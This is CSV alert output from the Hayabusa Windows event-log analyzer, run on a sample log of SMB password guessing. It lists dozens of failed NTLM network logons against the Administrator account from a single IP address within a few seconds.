2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qKqRY7L2IQRoU57  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMIkvwbvqc9V6CFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PehzjCnK42ZPUE7e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fqw2GWiYfO0kU83  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFPJJNCFdPJl4igl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zc6CrAr7YoozKB6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHXminAIeV4ZJIK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06YmUCHNZqbaZMdZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fYoENCtP2uPy9xNh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TRJRuXJTTH1afAfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpnkzTlc3Uvj3hpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIuD8haFzR8P87rL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL1IreMAiE564NXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMUiCaMGBC46MnPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MOSWbwooyb60LExG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSDNF7s3vbtkZIOz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JBMk0qOV6237XtK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j41R1U1tYPvApCkZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcPkVZSeg5VwChW8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDLxt5gaFDTKsiVl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94JvBKdxJkawQQMT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KgBMk00K3iC1GQem  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XdGOj9Ybm6bcCo3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: by6F4YKorxhp5ahn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1G6ZOgOaV6luDQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qqSwNfvpPLQd6ZH1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mxtJJj54xSzHibHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Y3yznfdaZ7dtwDO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esllFn4asbLxwkBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Pr0cgd6cF5ukhZ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pS2fabTrbl6rZ1NB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkylDDmUyuT57HdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Aqs8rSvuLAQuhfDp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KI07KTgBJc4kBSKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Re3n3nJ8EEhRRT3G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BzspAC3z1csEn0Ve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tpkb6bf42SLUst3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1F5d2wn60OgAExW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bhPNRHWhTyonDPuA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zEsnyWpUuHVBo6et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I2FwaWy9TALkk9eU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fuikeQsxlOUVifVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZWdsRJp9fHypPI1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0j0IBX2eZnx99n9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YIZ5Knxg0xr0WmDb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wuej3f7mEoWmd4SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0LcCi06ilIhFPwb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWsCGgoFmH06rRf4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP47JjNKqtYIZPsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mNlWZ9o0xf7bl2d0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hnPnB2lEN3BSDpXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVMyeF9jGuzHkTHg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sDKLl3PjW2qrzJGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkllnePSq3NQ5wgC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9qLWgQnR7P9cs7s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1AdU07nzvv7RB2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cHgiB5SMiQtsl5oD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 03e7QOn36l0jH35H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DoJBywV8x8cURwrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SDYGYO6s6g6Dbx8r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nUqXpeTNePFyBmCo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2h0qJWcbzRe1GSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edsfNOovOl1Ow503  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cxCC83XLMIJrNMvl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzussOcg5ihdrnD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 55l4HKICu8x0FpQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5GmlVWDjZ75tT08G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6v1DkuFvB04PESQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTLdNb0XbzXuLi51  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSjDYb1BhHC9UTxO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1yLH19VsfLx9BGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4AVhjdz9yHsfss0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqWLOKaKwS8VBxDj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
